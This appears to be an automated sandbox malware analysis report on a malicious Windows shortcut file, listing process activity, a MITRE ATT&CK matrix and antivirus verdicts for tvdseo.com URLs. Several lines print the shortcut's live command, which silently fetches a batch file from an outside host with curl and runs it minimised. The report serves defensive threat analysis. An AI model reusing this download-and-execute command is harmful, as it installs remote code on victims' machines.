Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4e
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.js
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-sear
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.png
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.png
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-600x251.png
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1.png
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_VUONG-removebg.png
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.png
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.png
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.png
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.png
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG.png
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Italic.ttf
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Medium.ttf
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttf
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-json/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/xmlrpc.php
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/xmlrpc.php?rsd
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://use.fontawesome.com/releases/v5.15.4/css/all.css?ver=2.0.3
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://www.dmca.com/Protection/Status.aspx?id=502286c4-db26-4ff5-898e-3899d9fd8507&amp;refurl=https
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://www.google.com/maps/embed?pb=
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LdvsEcqAAAAACGxQQMlRM5ahTlqMCdLjESH279L&amp;ver=3.0
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-4HCELHBG2B
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=GT-M3LB298
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-185801756-1
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-THFFBK43
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://www.youtube.com/channel/UCUZToD8MAs4MWywND_9DStg
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://www.youtube.com/channel/UCjt7SG-LPi6OafmLxoc1ULg
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownHTTPS traffic detected: 104.21.81.137:443 -> 192.168.2.7:49703 version: TLS 1.2

System Summary

barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: document.lnk.download.lnkLNK file: /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
Source: classification engineClassification label: mal72.winLNK@7/1@1/2
Source: C:\Windows\SysWOW64\curl.exeFile created: C:\Users\Public\UDkXtQleTB.batJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\curl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.batJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: document.lnk.download.lnkLNK file: ..\..\..\Windows\SysWOW64\cmd.exe

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: curl.exe, 00000002.00000003.1292734170.0000000003630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid AccountsWindows Management Instrumentation1
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		11
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS11
System Information Discovery		Distributed Component Object ModelInput Capture3
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562561 Sample: document.lnk.download.lnk Startdate: 25/11/2024 Architecture: WINDOWS Score: 72 23 tvdseo.com 2->23 29 Antivirus detection for URL or domain 2->29 31 Windows shortcut file (LNK) starts blacklisted processes 2->31 33 Machine Learning detection for sample 2->33 35 3 other signatures 2->35 8 cmd.exe 1 2->8         started        signatures3 process4 signatures5 37 Windows shortcut file (LNK) starts blacklisted processes 8->37 11 curl.exe 2 8->11         started        15 cmd.exe 1 8->15         started        17 conhost.exe 1 8->17         started        process6 dnsIp7 25 tvdseo.com 104.21.81.137, 443, 49703 CLOUDFLARENETUS United States 11->25 27 127.0.0.1 unknown unknown 11->27 21 C:\Users\Public\UDkXtQleTB.bat, HTML 11->21 dropped 19 conhost.exe 15->19         started        file8 process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
document.lnk.download.lnk5%ReversingLabs
document.lnk.download.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6100%Avira URL Cloudphishing
https://tvdseo.com/file/quan.batS100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4100%Avira URL Cloudphishing
https://tvdseo.com/dich-vu-seo-app-store-ios/100%Avira URL Cloudphishing
https://tvdseo.com/about/100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1100%Avira URL Cloudphishing
https://tvdseo.com/comments/feed/100%Avira URL Cloudphishing
https://tvdseo.com/dich-vu-seo-app-chplay/100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8l100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2)100%Avira URL Cloudphishing
https://tvdseo.com/category/phan-mem/100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4)100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.png100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2)100%Avira URL Cloudphishing
https://tvdseo.com/url-short-short-link/100%Avira URL Cloudphishing
https://tvdseo.com/file/quan.batD100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8l100%Avira URL Cloudphishing
https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/100%Avira URL Cloudphishing
https://tvdseo.com/app/ShemaTuyenDung.php100%Avira URL Cloudphishing
https://tvdseo.com/dich-vu-seo-tiktok/100%Avira URL Cloudphishing
https://tvdseo.com/dich-vu-seo-shop-lazada/100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons)100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2)100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4100%Avira URL Cloudphishing
https://tvdseo.com/cart-2/100%Avira URL Cloudphishing
https://tvdseo.com/100%Avira URL Cloudphishing
https://tvdseo.com/remove-background-xoa-nen-anh-free/100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.png100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4100%Avira URL Cloudphishing
https://tvdseo.com/#organization100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310100%Avira URL Cloudphishing
https://tvdseo.com/dich-vu-seo-youtube/100%Avira URL Cloudphishing
https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver=100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411100%Avira URL Cloudphishing
https://tvdseo.com/category/tin-hoc-ab/100%Avira URL Cloudphishing
https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6100%Avira URL Cloudphishing
https://tvdseo.com/file/quan.bate100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9.100%Avira URL Cloudphishing
https://tvdseo.com/dich-vu-seo-shop-tmdt/100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4)100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.png100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.png100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt100%Avira URL Cloudphishing
https://tvdseo.com/xmlrpc.php100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?ve100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4)100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4)100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.js100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4e100%Avira URL Cloudphishing
https://tvdseo.com/xmlrpc.php?rsd100%Avira URL Cloudphishing
https://tvdseo.com/iq-vo-cuc/100%Avira URL Cloudphishing
https://tvdseo.com/file/quan.bat100%Avira URL Cloudphishing
https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-sear100%Avira URL Cloudphishing
https://congdonginan.vn/0%Avira URL Cloudsafe
https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.png100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min.100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4);100%Avira URL Cloudphishing
https://tvdseo.com/dich-vu-seo-instagram/100%Avira URL Cloudphishing
https://tvdseo.com/#website100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.png100%Avira URL Cloudphishing
https://tvdseo.com/dich-vu-seo-facebook/100%Avira URL Cloudphishing
https://tvdseo.com/category/thongtinhay/100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2100%Avira URL Cloudphishing
https://tvdseo.com/dich-vu-seo-fanpage/100%Avira URL Cloudphishing
https://tvdseo.com/my-account-2/100%Avira URL Cloudphishing
https://tvdseo.com/dich-vu-seo-google-map/100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7100%Avira URL Cloudphishing
https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1100%Avira URL Cloudphishing
https://tvdseo.com/dich-vu-seo-shop-shoppe/100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttf100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.100%Avira URL Cloudphishing
https://tvdseo.com/#/schema/logo/image/100%Avira URL Cloudphishing
https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0100%Avira URL Cloudphishing

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tvdseo.com
104.21.81.137
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://tvdseo.com/file/quan.battrue
    • Avira URL Cloud: phishing
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4UDkXtQleTB.bat.2.drtrue
    • Avira URL Cloud: phishing
    		unknown
    https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6UDkXtQleTB.bat.2.drtrue
    • Avira URL Cloud: phishing
    		unknown
    https://tvdseo.com/file/quan.batScurl.exe, 00000002.00000002.1293075206.0000000003620000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: phishing
    		unknown
    https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1UDkXtQleTB.bat.2.drtrue
    • Avira URL Cloud: phishing
    		unknown
    https://tvdseo.com/dich-vu-seo-app-chplay/UDkXtQleTB.bat.2.drtrue
    • Avira URL Cloud: phishing
    		unknown
    https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4UDkXtQleTB.bat.2.drtrue
    • Avira URL Cloud: phishing
    		unknown
    https://tvdseo.com/about/UDkXtQleTB.bat.2.drtrue
    • Avira URL Cloud: phishing
    		unknown
    https://tvdseo.com/dich-vu-seo-app-store-ios/UDkXtQleTB.bat.2.drtrue
    • Avira URL Cloud: phishing
    		unknown
    https://tvdseo.com/comments/feed/UDkXtQleTB.bat.2.drtrue
    • Avira URL Cloud: phishing
    		unknown
    https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411UDkXtQleTB.bat.2.drtrue
    • Avira URL Cloud: phishing
    		unknown
    https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8lUDkXtQleTB.bat.2.drfalse
    • Avira URL Cloud: phishing
    		unknown
    https://www.google.com/recaptcha/api.js?render=6LdvsEcqAAAAACGxQQMlRM5ahTlqMCdLjESH279L&amp;ver=3.0UDkXtQleTB.bat.2.drfalse
      		high
      https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)UDkXtQleTB.bat.2.drfalse
      • Avira URL Cloud: phishing
      		unknown
      https://tvdseo.com/file/quan.batDcurl.exe, 00000002.00000002.1293163205.0000000003655000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292708702.0000000003655000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      		unknown
      https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2)UDkXtQleTB.bat.2.drfalse
      • Avira URL Cloud: phishing
      		unknown
      https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4)UDkXtQleTB.bat.2.drfalse
      • Avira URL Cloud: phishing
      		unknown
      https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2)UDkXtQleTB.bat.2.drfalse
      • Avira URL Cloud: phishing
      		unknown
      https://tvdseo.com/category/phan-mem/UDkXtQleTB.bat.2.drfalse
      • Avira URL Cloud: phishing
      		unknown
      https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.pngUDkXtQleTB.bat.2.drfalse
      • Avira URL Cloud: phishing
      		unknown
      https://gravatar.com/dungk396UDkXtQleTB.bat.2.drfalse
        		high
        https://tvdseo.com/url-short-short-link/UDkXtQleTB.bat.2.drfalse
        • Avira URL Cloud: phishing
        		unknown
        https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8lUDkXtQleTB.bat.2.drfalse
        • Avira URL Cloud: phishing
        		unknown
        https://tvdseo.com/dich-vu-seo-tiktok/UDkXtQleTB.bat.2.drfalse
        • Avira URL Cloud: phishing
        		unknown
        https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/UDkXtQleTB.bat.2.drfalse
        • Avira URL Cloud: phishing
        		unknown
        https://tvdseo.com/app/ShemaTuyenDung.phpUDkXtQleTB.bat.2.drfalse
        • Avira URL Cloud: phishing
        		unknown
        https://tvdseo.com/dich-vu-seo-shop-lazada/UDkXtQleTB.bat.2.drfalse
        • Avira URL Cloud: phishing
        		unknown
        https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4UDkXtQleTB.bat.2.drfalse
        • Avira URL Cloud: phishing
        		unknown
        https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2)UDkXtQleTB.bat.2.drfalse
        • Avira URL Cloud: phishing
        		unknown
        https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttfUDkXtQleTB.bat.2.drfalse
        • Avira URL Cloud: phishing
        		unknown
        https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons)UDkXtQleTB.bat.2.drfalse
        • Avira URL Cloud: phishing
        		unknown
        https://news.google.com/publications/CAAqBwgKMP6toQswlri5Aw?hl=vi&amp;gl=VN&amp;ceid=VN%3AviUDkXtQleTB.bat.2.drfalse
          		high
          https://tvdseo.com/cart-2/UDkXtQleTB.bat.2.drfalse
          • Avira URL Cloud: phishing
          		unknown
          https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4UDkXtQleTB.bat.2.drfalse
          • Avira URL Cloud: phishing
          		unknown
          https://schema.orgUDkXtQleTB.bat.2.drfalse
            		high
            https://tvdseo.com/UDkXtQleTB.bat.2.drtrue
            • Avira URL Cloud: phishing
            		unknown
            https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.pngUDkXtQleTB.bat.2.drfalse
            • Avira URL Cloud: phishing
            		unknown
            http://www.dmca.com/Protection/Status.aspx?ID=502286c4-db26-4ff5-898e-3899d9fd8507UDkXtQleTB.bat.2.drfalse
              		high
              https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/remove-background-xoa-nen-anh-free/UDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://tvdseo.com/#organizationUDkXtQleTB.bat.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
